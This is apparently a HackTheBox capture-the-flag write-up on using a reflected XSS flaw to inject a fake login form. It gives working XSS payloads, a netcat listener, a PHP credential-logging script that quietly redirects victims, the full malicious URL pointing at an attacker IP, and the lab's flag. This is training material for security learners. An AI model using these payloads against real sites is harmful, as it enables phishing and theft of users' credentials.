HackTheBox — XSS: Phishing

- Phishing has become increasingly popular nowadays as it has been the main way for attackers to scam victims.
- In this blog post, we will explore how to use XSS to perform a phishing attack.
XSS Discovery

- Let’s try the
<script>alert(1)</script>
in the above application. - Nothing happens as we submite the payload. Let’s try some other payloads on the URL to see if the application is vulnerable.

- We will try using XSS Striker to discover valid payloads.
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python XSStrike -u "http://$TARGET/phishing/index.php?url=<script>alert(1)<%2Fscript>"
- Let’s try to discover the payload manually. Try input “Testing payload” and see where it is in the HTML body

- The values seems to appear within the src attribute of the image tag.
- Let’s try the following payload
x’ onerror=alert(1) alt=’testing xss
, which results in a complete image tag<img src=’x’ onerror=alert(1) alt=’testing xss’ >

- The application does trigger the alert. We’ve found a valid payload.
Login Form Injection
- Now that we have identified a valid payload, we can inject a Login form to the target so it will connect back to our server.
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>
- To inject this form, we use
document.write()
function. So the payload looks like:
document.write('<h3>Please login to continue</h3><form action=http://10.10.15.119:5555><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
- Replace the
alert(1)
inx’ onerror=alert(1) alt=’testing xss
with the payload in the URL. - Set up Netcat listener:
nc -lnvp 5555
- Once the login form is injected, submit some random credentials. We should get a connection back to our server

- As seen in the screenshot, not only did we get a connection back to our server, but we also obtained login credentials (
test:pass
). - In theory, this is how we steal credentials from users. However, the victim may get the “site can’t be reached” error, which will raise suspicions for users.
- Hence, it is better to log users’ credentials and return them to the original page without any injections. The
index.php
should look like this
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://$TARGET/phishing/index.php");
fclose($file);
exit();
}
?>
- Store
index.php
in/tmp/tmpservers
in attacker server. - Start a PHP listener
sudo php -S 0.0.0.0:8080
- From the above payload, remember to change ther listening port. Submit the log in and we should get credentials from users

- In the front end, users should return to
/phishing/index.php
page.
Answer the question
Try to find a working XSS payload for the Image URL form found at ‘/phishing’ in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit ‘/phishing/send.php’ to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim’s login credentials, which you can use to login to ‘/phishing/login.php’ and obtain the flag.
- Repeat the above steps. Once we have confirmed to retrieve the credentials, copy the whole url and pasted it into the URL field in
send.php
http://10.129.56.135/phishing/index.php?url=x%27+onerror%3Ddocument.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.160%3A8080%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29+alt%3D%27testing+xss
- We should get the credentials on our terminal

- Log in with the credentials and we should get the flag.
Answer: HTB{r3f13c73d_cr3d5_84ck_2_m3}
CONCLUSION
- That’s it for today. This is something really new and exciting for a lot of beginners. The technical aspect may be a little bit overwhelming but it is all worthy.
- Please clap if you like my post and follow me for more Cybersecurity content.